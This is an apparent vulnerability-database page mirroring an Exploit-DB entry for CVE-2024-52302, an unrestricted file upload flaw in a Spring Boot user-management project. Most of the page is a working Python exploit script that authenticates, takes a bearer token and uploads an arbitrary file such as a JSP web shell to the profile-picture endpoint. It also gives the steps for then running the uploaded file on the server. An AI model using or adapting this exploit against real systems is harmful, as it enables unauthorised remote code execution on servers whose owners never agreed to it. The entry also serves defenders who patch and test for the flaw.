Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Spring Boot common-user-management 0.1 - Remote Code Execution (RCE)

🗓️ 15 Apr 2025 00:00:00Reported by d3scaType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 302 Views

Unrestricted file upload in Spring Boot allows Remote Code Execution via malicious file uploads.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2024-52302
14 Nov 202415:28
circl
CNNVD		Java-springboot-codebase 代码问题漏洞
14 Nov 202400:00
cnnvd
CVE		CVE-2024-52302
14 Nov 202415:26
cve
Cvelist		CVE-2024-52302 common-user-management Unrestricted File Upload Leading to Remote Code Execution (RCE)
14 Nov 202415:26
cvelist
GithubExploit		Exploit for CVE-2024-52302
14 Nov 202416:04
githubexploit
EUVD		EUVD-2024-45839
3 Oct 202520:07
euvd
NVD		CVE-2024-52302
14 Nov 202416:15
nvd
OSV		CVE-2024-52302 common-user-management Unrestricted File Upload Leading to Remote Code Execution (RCE)
14 Nov 202415:26
osv
Packet Storm		📄 Spring Boot common-user-management 0.1 Shell Upload
15 Apr 202500:00
packetstorm
Positive Technologies		PT-2024-35165 · Unknown · Common-User-Management
14 Nov 202400:00
ptsecurity
Rows per page
# Exploit Title: Unrestricted File Upload
# Google Dork:
# Date: 14/Nov/2024
# Exploit Author: d3sca
# Vendor Homepage:
https://github.com/OsamaTaher/Java-springboot-codebase
# Software Link:
https://github.com/OsamaTaher/Java-springboot-codebase
# Version: [app version] 0.1
# Tested on: Debian Linux
# CVE : CVE-2024-52302


# Steps to Reproduce:

# Upload Malicious File: Send a PUT request to /api/v1/customer/profile-picture using customer with role 26,17 added with a malicious file payload (e.g., .jsp, .php, .html).

# GET the file location: Send GET request /api/v1/customer/my-profile , grap the file location in response with the profile's link.

# Execute the Uploaded File: Using the file name access the file directly through the URL returned in the response.
# If the server supports the uploaded file type, it will execute the file, leading to Remote Code Execution.


import requests
import argparse
import sys


requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def login(url, username, password):
    """Authenticate with the API and return the Bearer token."""
    login_endpoint = f"{url}/api/v1/user/login"
    headers = {"Content-Type": "application/json"}
    payload = {
        "username": username,
        "password": password
    }

    try:
        response = requests.post(login_endpoint, json=payload, headers=headers, verify=False)
        response.raise_for_status()

        # Extract token
        token = response.json().get("token")
        if not token:
            print("[!] Token not found in response. Exiting.")
            sys.exit(1)

        print("[+] Authentication successful. Token acquired.")
        return token
    except Exception as e:
        print(f"[!] Login failed: {e}")
        sys.exit(1)

def upload_file(url, token, file_path):
    """Upload a file to the profile picture endpoint using the Bearer token."""
    upload_endpoint = f"{url}/api/v1/customer/profile-picture"
    headers = {
        "Authorization": f"Bearer {token}"
    }
    files = {
        "file": open(file_path, "rb")
    }

    try:
        response = requests.post(upload_endpoint, headers=headers, files=files, verify=False)
        response.raise_for_status()

        if response.status_code == 200:
            print("[+] File uploaded successfully.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[!] Failed to upload file. Status code: {response.status_code}")
            print(f"[!] Response: {response.text}")
    except Exception as e:
        print(f"[!] File upload failed: {e}")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="Exploit script for unrestricted file upload vulnerability.")
    parser.add_argument("-u", "--username", required=True, help="Username for login")
    parser.add_argument("-p", "--password", required=True, help="Password for login")
    parser.add_argument("-f", "--file", required=True, help="File to upload")
    parser.add_argument("-url", "--url", required=True, help="Base URL of the target application (e.g., https://target.com)")

    args = parser.parse_args()

    # Authenticate 
    token = login(args.url, args.username, args.password)

    # Upload the file
    upload_file(args.url, token, args.file)

if __name__ == "__main__":
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Apr 2025 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 48.7
EPSS0.07457
SSVC
unrestricted file uploadremote code executionspring bootfile upload exploitcve-2024-52302malicious file payload.
302